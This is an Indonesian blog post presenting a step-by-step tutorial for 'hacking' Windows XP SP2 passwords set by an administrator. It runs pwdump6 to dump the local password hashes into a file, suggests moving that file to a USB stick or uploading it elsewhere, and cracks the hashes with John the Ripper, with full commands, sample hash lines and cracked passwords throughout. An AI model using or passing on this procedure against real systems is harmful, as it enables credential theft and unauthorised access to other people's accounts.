Thursday, May 5, 2011

Cara Hack Password Windows XP Sp-2





    Cara kali ini merupakan salah satu dari beberapa cara yang dapat kamu gunakan untuk mengetahui password windows XP yang diberi password oleh Administrator.
    Trik ini memanfaatkan 2 software, yaitu pwdump6 dan John The Ripper.


    Ok, langsung aja...
    Kita jalankan saja program pwdump6. Sebelumnya downlod dulu pwdump6 ini dari sini 

    Setelah itu....

    1. Jalankan CMD (Run->cmd)
    2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)
    D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1
    pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
    Copyright 2006 foofus.net
    This program is free software under the GNU
    General Public License Version 2 (GNU GPL), you can redistribute it and/or
    modify it under the terms of the GNU GPL, as published by the Free Software
    Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
    PROGRAM. Please see the COPYING file included with this program
    and the GNU GPL for further details.
    Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
    Key length is 16
    Completed.
    3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :
    ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
    Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
    coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
    Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
    HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
    SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::
    4. Okey.... Password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

    Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :
    D:\john171w\john1701\run>john-mmx.exe pass.txt
    Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
    REN123 (Administrator:2)
    TEBAK (coba:2)
    ADMINKE (Administrator:1)
    MUDAHDI (coba:1)
    Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
    Administrator:1+Administrator:2 = adminkeren123
    Sedangkan untuk user “coba” adalah “mudahditebak”!!

    Mudah bukan? 

    Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.
     
     
    Sumber : http://www.wahyu-winoto.com

No comments:

Post a Comment